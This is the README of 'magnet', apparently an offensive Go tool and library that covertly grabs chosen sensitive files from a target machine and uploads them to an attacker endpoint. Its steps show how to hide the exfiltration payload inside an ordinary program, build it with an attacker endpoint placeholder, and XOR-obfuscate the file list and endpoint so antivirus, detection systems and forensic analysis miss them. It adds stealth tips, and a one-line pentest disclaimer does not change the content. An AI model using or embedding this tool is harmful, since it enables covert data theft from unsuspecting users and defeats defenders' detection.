🧲⚡
  Grab interesting files from target

Cross-platform
Stealth
Portable

The library is built to fetch predefined files of interest from a remote device. It assumes that an HTTP endpoint is listening when the program is launched.

Program execution on target will stealthy provide you the files you ask for.

You have 2 possibilities:

• Hide exfiltration in your program
• Use the standalone magnet executable

^{For educational purpose only or during pentest assessment with prior permission}

All the work is made At compilation time, you need to specify:

• The remote endpoint, where juicy files are uploaded
• The Juicy files, list of files you want to grab
• The target os, to fit the target (between: windows, darwin, linux)
• The method uses for exfiltration (http, tcp)

export KEY=[YOUR_KEY]
export FILES=[FILENAME]
export ENDPOINT=[ATTACKER_ENDPOINT]
export METHOD=[EXFILTRATION_METHOD]

1. Add magnet import and declare variables outside your main() function:

import "github.com/ariary/magnet/pkg/magnet"

var FileList,Key,Endpoint,Method string

2. Add magnet payload in the main():

	sender := magnet.InitMagnetSender(Method)
	magnet.Magnet(sender, FileList, Endpoint, Key, debug)

3. Finally, modify the build command by adding -ldflags "-X 'main.FileList=$FILES' -X 'main.Key=$KEY' -X 'main.Endpoint=$ENDPOINT' -X 'main.Method=$METHOD'" and CGO_ENABLED=0

see declare magnetenvironment variables

To build magnet binary in one step:

# ensure lobfuscator is in your PATH
./build.sh $FILES $ENDPOINT $KEY $METHOD

See lobfuscator and full example

To avoid detection systems, as we are seeking for sensitive files, the different files we want to grab must not be in clear text within the binary . Hence it used basic encryption with the key to decrypt embedded in binary. (The aim is only to avoid AV and Detection system not to have strong encryption scheme)

The same thing is made for the remote endpoints, to make the forensic analysis harder.

lobfuscator is the simple tool to perform the XOR encryption/decryption.

An exemple to build the obfuscated list:

cat [FILE] | lobfuscator $KEY > obfuscated.txt
# decrypt: cat obfuscated.txt | lobfuscator -d $KEY

make build.lobfuscator

Define FILES and ENDPOINT envar:

export FILES=$(cat [FILE] | lobfuscator $KEY)
export ENDPOINT=$(echo "[ENDPOINT]" | lobfuscator $KEY)

You can also use lobfuscator without providing a key to encrypt (will generate a random key of the size of the input):

# Encrypt with random key
cat samples/linux_juicy_files.txt | ./lobfuscator > encrypted.txt 2>tmp.txt && cat tmp.txt | cut -d ":" -f 2- > keys.txt && rm tmp.txt
# Decrypt using file containing keys
cat encrypted.txt| ./lobfuscator -d -kf keys.txt

• For the remote endpoint , I suggest you to use the /push endpoint of a gitar listener
• The software is built to be stealthy hence:
  • error handling is not verbose (hidden flag to get more verbosity -thisisdebug)
  • I suggest to overwrite usage string in magnet.go to fit your attack scenario (for standalone use)
• To enhance the binary obfuscation use garble to compile magnet instead of go(adapt build.sh consequently)

• Handle directories
• Use other protocols to send files (ICMP, DNS, SMTP, etc...)
• magnetgentool is on the making, it will be used with //go:generate comment to stealthy inject magnet code.